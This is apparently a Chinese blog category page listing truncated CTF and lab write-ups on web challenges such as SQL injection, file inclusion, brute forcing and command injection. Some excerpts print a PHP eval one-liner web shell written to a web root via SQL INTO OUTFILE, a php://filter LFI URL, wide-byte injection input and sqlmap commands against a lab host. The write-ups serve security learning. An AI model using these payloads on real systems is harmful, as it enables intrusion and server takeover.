![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF学习
CTF学习
LEO-max
GPT农名工
展开
-
DVWA-Brute Force
笔者随手一试,admin,password竟然正确了,惊!果然是low等级的啊,不过还是要完整做一遍的。随便输入username与password用burpsuite抓包。进行爆破:注意我们要爆破username和password,所以attack type 我们要选择cluser bomb,并且只能在需要爆破的地方加上Add哦Payload set 1和2 在Option中选择相关...原创 2020-01-24 01:07:00 · 295 阅读 · 0 评论 -
CGCTF——GBK Injection
该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路。(%df%27是双字节不转义单引号实现注入的方法)原理参考:https://blog.csdn.net/weixin_42419856/article/details/82872653参考2:https://lyiang.wordpress.com/2015/06/09/sql%E6%B3%A8%E5%85%A5%EF%BC%...原创 2020-02-10 15:36:30 · 409 阅读 · 0 评论 -
CGCTF——MYSQL
<?phpif($_GET[id]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); //连接数据库 mysql_select_db(SAE_MYSQL_DB); //选择数据库 $id = intval($_GET[id]); //i...原创 2020-02-10 12:41:50 · 374 阅读 · 0 评论 -
CGCTF——文件包含
没错 这就是传说中的LFI由于是文件包含类型,根据题目可能为LFI类型利用的是php伪协议http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php进行base64加密PGh0bWw+CiAgICA8dGl0bGU+YXN...原创 2020-02-07 23:35:09 · 638 阅读 · 0 评论 -
CGCTF——php decode
见到的一个类似编码的shell,请解码<?phpfunction CLsI($ZzvSWE) { $ZzvSWE = gzinflate(base64_decode($ZzvSWE)); for ($i = 0; $i < strlen($ZzvSWE); $i++) { $ZzvSWE[$i] = chr(ord($ZzvSWE[$i]...原创 2020-02-07 23:25:56 · 563 阅读 · 0 评论 -
CGCTF——单身二十年
我有女朋友不靠手速,靠抓!!!抓包:将search_key.php进行repeater操作Go!!!原创 2020-02-07 23:19:04 · 443 阅读 · 0 评论 -
CGCTF——COOKIE
题目:TIP: 0==notburpsuite抓包:题目说明 0 = not将0改成1(为真)进行forward发包:原创 2020-02-07 23:13:15 · 341 阅读 · 0 评论 -
CGCTF——AAencode
题目:javascript aaencode打开链接:出现了一堆看不懂将页面转成unicode:这就和题目内容相关了,进行解码就OK了,我们也可以在 控制台 将这写颜文字进行操作...原创 2020-02-07 23:07:12 · 531 阅读 · 0 评论 -
CGCTF——层层递进
点开题目链接直接跳转一个另一个网页F12查看源代码:(如果不方面看可以 Ctrl+u 看)在源代码中看见src="so.html;src什么意思?HTML中src是source的缩写,这里是源文件的意思。“source”本身是“源”的意思。点击 so.html又来?根据题目层层递进的含义,不断点src。从so.html 跳转到 so.htm 最后跳转到 404.html:发...原创 2020-02-07 23:01:41 · 547 阅读 · 0 评论 -
CGCTF——md5 collision
源码(PHP)$md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}";} else { echo "false!!!";}}...原创 2020-02-07 22:14:35 · 337 阅读 · 0 评论 -
墨者学院——WSGI 漏洞复现(CVE-2018-7490)
此题不难,写wp的目的是为了记住uWSGL相关问题的方向背景介绍uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。实训目标1、学会根据...原创 2020-02-09 23:20:45 · 1391 阅读 · 0 评论 -
墨者学院——phpMyAdmin后台文件包含分析溯源
此题利用一句话木马进入登陆界面,用burpsuite爆破得到username与password都为:root进入SQL界面,输入一句话木马(密码为leo),点击“执行”:select "<?php eval($_post[leo]);?>" into outfile "/var/www/html/3.php"此时打开蚁剑(注意:url后面记得跟上一句话木马目标的页面3....原创 2020-02-09 22:52:41 · 516 阅读 · 0 评论 -
墨者学院——SQL注入漏洞测试(布尔盲注)
题目: 背景介绍一位热心的网友再次向“墨者”安全工程师挑战,“墨者”工程师在注入时发现网页无回显,“墨者”工程师想了一会就注入完成拿到了key。所以从这里的URL入手,存在注入点利用sqlmap注入:sqlmap.py -u url --current-db 获取到的数据库名是stormgroupsqlmap.py -u http://219.153.49.228:42218/ne...原创 2020-02-09 15:14:42 · 522 阅读 · 0 评论 -
墨者学院 ——X-Forwarded-For注入漏洞实战
前言: 小白昨天在利用sqlmap注入的时候,死活不成功(连接超时),把我搞崩溃了,今天又试了一下还是如此。当我把小飞机(科学上网)关了,再次尝试,成功了!所以如果和我有一样状况的新手们可要注意这个问题哦。步骤一: 利用burpsuite抓包并且发送到reperter, 添加x-forwarded-for:* 1.将Request的Raw内容复制到自己新建的一个txt文档,命名为x...原创 2020-02-09 13:53:38 · 676 阅读 · 0 评论 -
BUUCTF [HCTF 2018]WarmUp
打开界面出现一张图片——>F12查看源码:提示进入source.php进入界面:根据代码内容,查看hint,提示flag在ffffllllaaaagggg中代码审计:$whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string...原创 2020-02-04 19:03:15 · 529 阅读 · 0 评论 -
BUUCTF crypto变异凯撒
打开文件:这是什么鬼? 只好去py一波了,发现是从ASCII码,afZ_ ASCII码分别是97,102,90,95;而flag的ASCII码则是102 108 97 103,脑洞打开:97+5=102;102+6=108;90+7=97;95+8=103,以此类推,利用C语言来算。#include<stdio.h>int main(){int i;char a[30...原创 2019-12-21 15:33:29 · 2801 阅读 · 1 评论 -
攻防世界(高手进阶区)——upload1
前提:打开页面,知道此题是关于文件上传漏洞的,打开源代码,提示只能上传jpg结尾的图片,于是我通过UltraEdit将一句话木马编辑到一张图片,进行文件上传,虽然页面提示上传成功,但是我用蚁剑连接总是不成功,于是有了后面的操作。。。。。。经过思索,我发现以上操作在此题没有必要,(其实上面操作可以利用简单的挂黑页操作)我新建了一个含一句话木马的且后缀为jpg的文档,进行上传,进行抓包:将...原创 2020-02-12 14:28:30 · 1352 阅读 · 2 评论 -
攻防世界(高手进阶区)——Web_php_include
做完此题后参考了其他大佬写的wp,发现方法不同,此题我才用的是通过一句话木马注入。使用御剑扫一下目录:发现熟悉的http://111.198.29.45:53486/phpmyadmin/,打开链接:一般username与password都为root,但此题的username为root,密码为空;在SQL处写入一句话木马和文件包含:select "<?php eval(@$_P...原创 2020-02-11 22:21:37 · 1776 阅读 · 0 评论 -
攻防世界(高手进阶区)——NaNNaNNaNNaN-Batman
下载附件有乱码,但可以发现是js代码。用浏览器打开出现一个搜索框,但没有什么反应。参考了其他大佬的wp, 核心代码: eval函数,这是执行函数;这里执行了_变量中的内容也就是''中的内容。 但是,要注意的是,它并没有执行$()函数,仅仅执行了字符串而已(从而导致乱码), 因而页面html页面没有任何显示,只显示了input标签的内容,但是我们想让源代码正常显示出来, 不进行执行...原创 2020-02-11 22:10:32 · 694 阅读 · 0 评论 -
攻防世界(高手进阶区)——NewsCenter
御剑扫一下,发现有robots.txt与config.php,不过是个空白页面;放弃。用burpsuite抓包,:尝试xff,无果,直接sql注入,利用sqlmap.将Request中的Raw内容拷贝到一个txt文档,用sqlmap爆。(注意将文档拷贝到sqlmap文件所在位置)sqlmap.py -r flag.txt --dbs发现两个包,分别尝试,只有news有:sqlm...原创 2020-02-11 21:10:44 · 2139 阅读 · 0 评论 -
攻防世界baby_web
题目描述:想想初始页面是哪个打开链接,发现跳转到了1.php根据题目描述 初始页面,我们知道,index一般为页面默认页,我们试试index.php,还是自动跳转到1.php,这是我们F12进入开发者模式,进入网络选项卡,发现有Index.php的文件,找到flag我试了用Burpsuite抓包同样也能做出来,注意:我把起先的1.php改成了index.php,得到 响应Flag i...原创 2020-01-23 13:50:53 · 9478 阅读 · 0 评论 -
攻防世界Training-WWW-Robots
这一题不太难,和新手训练的robots协议一样进入robots.txt界面根据提示进入 fl0g.php界面拿到flag.原创 2020-01-23 12:14:59 · 313 阅读 · 1 评论 -
攻防世界command_execution
小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。这一题是关于windows与Linux的命令执行。好吧,上过一学期的Linux课程对命令的掌握还是不太熟悉,这一题只能py别人的WP了…打开链接,需要我们去输入ping的地址。能想到的只有是本地地址了。127.0.0.1有效果,说明地址是对的此时就试试用Linux的ls命令列出当前的目录,127.0.0...原创 2020-01-23 12:03:04 · 2261 阅读 · 4 评论 -
攻防世界webshell
这一题主要是关于一句话木马的使用与工具的使用。本题不难,针对像我一样的新手用来了解其中内涵吧。题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里打开页面,出现一句话木马使用蚁剑进行操作,一句话木马中给出密码是shell,进行添加点击进入添加的地址:拿到flag...原创 2020-01-23 11:22:57 · 4970 阅读 · 3 评论 -
攻防世界xff_referer
题目描述:X老师告诉小宁其实xff和referer是可以伪造的。看到题目肯定想到是关于 “xff头” 与 “referer” 这俩玩意的了打开页面,要求ip要为123.123.123.123,我们通过 burpsuite进行伪造修改进入Repeater选项卡,添加xff头,得到响应,需要利用referer将https://www.google.com添加得到响应,拿到flag...原创 2020-01-23 11:05:20 · 2784 阅读 · 0 评论 -
攻防世界weak_auth
此题的登入界面不知道为何做完之后就打不开了,所以我就不在这黏贴界面。首先要我们随便输入username和password,跳出的check.php界面要求username为admin,所以我们只要知道密码就OK了。用burpsuite破解打开intruder选项卡注意:要把admin两边的符号给删了,只保留psaaword的进入Payloads选项卡,在Payloads Opti...原创 2020-01-22 10:08:31 · 3007 阅读 · 1 评论 -
攻防世界get_post
此题需要火狐浏览器的hackbar插件F12选中hackbar点击Load URL根据题意用get方式提交一个名为a,值为1的变量,再点击Execute,跳出另一个条件选中 Post date,输入b=2,再次点击Execute,得到flag关于hackbar插件的功能还有很多,大家可以参考:https://www.jianshu.com/p/02dcc7348436...原创 2020-01-21 20:28:56 · 2606 阅读 · 0 评论 -
攻防世界cookie
这一题是关于cookie问题,我不太懂,只能一边写博客记录一边做题了。。。查看cookie的方法有多种,我先在开发者模式的console输入javascript:alert(document.cookie)界面跳出:于是我又进入cookie.php参考http的响应。妈呀,又得百度如何查看http的响应,发现可以通过抓包来实现。...原创 2020-01-21 19:49:00 · 1192 阅读 · 0 评论 -
攻防世界backup
打开页面:关于index.php的备份文件名,什么是备份文件名?我去百度了一下所以…加上index.php.bak打开下载的文件:拿到flag.原创 2020-01-21 14:16:18 · 1099 阅读 · 0 评论 -
攻防世界robots
打开页面发现啥也没有查看源码:提示flag is not here.题目是关于robots协议的,所以用御剑扫一下目录果真,打开robot.txt:发现“f1ag_1s_h3re.php”刚开我是直接在原地址后面加上f1ag_1s_h3re.php,没有flag出现于是更改了一下拿到flag.我百度了一下robots协议,原来disallow是该协议的文件写法。...原创 2020-01-21 13:59:57 · 1853 阅读 · 0 评论 -
攻防世界simple_js
我以为是 simple_is原来是js让我们输入密码查看源码:我靠,真的要读懂js的代码?我也没学啊! 好吧,参考了其他人的代码审计,无论 输入什么都是假密码,真密码在fromCharCode。发现下面的字符串正是关于fromCharCode的。一串十六进制字符先转成十进制,用python写吧再将十进制通过ASCII码转换得到flag(可以对照着表转换也可以写python)...原创 2020-01-20 20:46:12 · 1851 阅读 · 0 评论 -
攻防世界simple_php
代码审计:不难发现代码中给出了两个条件,且贱贱的把flag拆分到两个条件中。条件1:if($a==0 and $a){echo $flag1;}说明:参数a=0且a为真才能得到半个flag.条件2:if(is_numeric($b)){exit();}说明:is_numeric()函数可以参考https://www.runoob.com/php/php-is_numeri...原创 2020-01-20 19:52:08 · 3061 阅读 · 0 评论